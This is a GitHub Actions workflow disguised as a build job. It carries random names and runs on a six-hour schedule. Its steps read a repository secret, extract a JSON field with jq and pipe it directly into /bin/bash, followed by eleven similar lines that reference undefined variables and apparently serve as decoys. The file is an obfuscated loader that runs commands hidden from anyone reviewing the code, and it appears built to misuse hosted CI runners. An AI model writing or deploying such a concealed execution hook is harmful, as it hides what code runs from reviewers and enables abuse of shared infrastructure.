name: zhoujinwei2345
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoujinwei2345
        env:
          vuj05: ${{ secrets.vuj05 }}
        run: |
          echo $vuj05 | jq -r .owthv69 | /bin/bash
          echo $xxyq75 | jq -r .tpr5 | /bin/bash
          echo $qxyr954 | jq -r .yjeb81 | /bin/bash
          echo $v89570 | jq -r .sesm61 | /bin/bash
          echo $f57 | jq -r .rke8187 | /bin/bash
          echo $qyn46 | jq -r .zbdsg35293 | /bin/bash
          echo $idi26070 | jq -r .tcrvg2366 | /bin/bash
          echo $njm71399 | jq -r .ajug46778 | /bin/bash
          echo $u88 | jq -r .mvvo8 | /bin/bash
          echo $sumny364 | jq -r .jloe729 | /bin/bash
          echo $yooer164 | jq -r .t28 | /bin/bash
          echo $jjl1 | jq -r .mf46 | /bin/bash

